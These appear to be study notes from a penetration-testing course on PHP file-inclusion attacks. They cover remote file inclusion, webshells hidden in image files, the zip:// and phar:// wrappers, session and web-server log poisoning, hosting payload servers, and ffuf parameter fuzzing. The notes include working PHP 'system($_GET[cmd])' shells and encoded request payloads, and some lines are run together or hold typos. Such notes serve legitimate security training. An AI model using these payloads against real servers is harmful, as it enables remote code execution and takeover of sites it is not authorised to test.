In some cases we may be able to include remote files (Remote File Inclusion) if the vulnerable function allows the inclusion of remote URLs.
In most languages, including remote URLs is considered dangerous practice. This is why it is usually disabled by default. Any remote URL inclusion in PHP would require the allow_url_include setting to be on. View remote > ###PHP Wrappers to verify if this setting exists. Another possible way is to just include a URL to see if we can get its content. A local URL is a good option.
Avoid including the vulnerable page itself as this may cause recursive inclusion loop leading to DoS.
After generating an RCE script, we will need to host this script somewhere. Port 80 or 443 are good options since these are usually whitelisted.
# HTTP
sudo python3 -m http.server <LISTENING_PORT>
# FTP
sudo python -m pyftpdlib -p 21
# SMB
impacket-smbserver -smb2support share $(pwd)
Impacket v0.9.24 - Copyright 2021 SecureAuth CorporationFile Upload
If any vulnerable function has code execution capabilities, then the code within the file we upload will get executed if we include it.
This type of attack involves uploading a malicious file and then through the LFI vulnerability, executing the payload inside the file.
# example PHP shell in .gif
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gifIn PHP environments, the zip wrapper (not enabled by default) can execute code for us. We first upload the zip file with our shell, and execute our LFI. We can refer to any files inside the zip with #shell.php (if in URL, must be encoded.)
zip://shell.jpg%23shell.php&cmd=idSimilarly, the phar:// wrapper can achieve a similar result. Where we need a phar file
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$pxhar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# generate the file
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpgWe include the file with
phar://./profile_images/shell.jpg%2Fshell.txt
Log Poisoning
Similarly to the above attack, if we execute permissions on a vulnerable function, we can write malicious code to a log file and then include that log file to execute the PHP code.
Most PHP web applications use PHPSESSID cookeis, which hold user-related data on the back-end. These are usually stored in /var/lib/php/sessions on Linux or C:\Windows\Temp on Windows. The name of the file that contains our user’s data matches the name of our PHPSESSID cookied with the sess_ prefix. If we can control the values in this file we can inject our own code into it to be run when include the file. For example the the session file stores the language parameter in it so
http://<SERVER_IP>:<PORT>/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3EAnother technique is Server Log Poisoning. Apache and Nginx maintain various log files. access.log file contains information about all request made to server including our User-Agent. Since we can control the User-Agent header we can poison the logs. Nginx logs are readable by low privileged users by default while Apache require a user with high privileges.
Apache logs are located
/var/log/apache2on LinuxC:\xampp\apache\logson Windows Nginx logs are located/var/log/nginxon LinuxC:\nginx\logon Windows
Tip: The User-Agent header is also shown on process files under the Linux /proc/ directory. So, we can try including the /proc/self/environ or /proc/self/fd/N files (where N is a PID usually between 0-50), and we may be able to perform the same attack on these files. This may become handy in case we did not have read access over the server logs, however, these files may only be readable by privileged users as well.
Other valid service log locations we can use are
/var/log/sshd.log/var/log/mail/var/log/vsftpd.log
Fuzzing
Many parameters are not linked to any HTML forms, they should be fuzzed to see if they exist.
# Get parameter fuzzing
ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
# lfi wordlists
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
# server web root fuzzing
ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
# server logs fuzzing
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287 Some other tools to automate the process is LFISuite, LFiFreak, and liffy.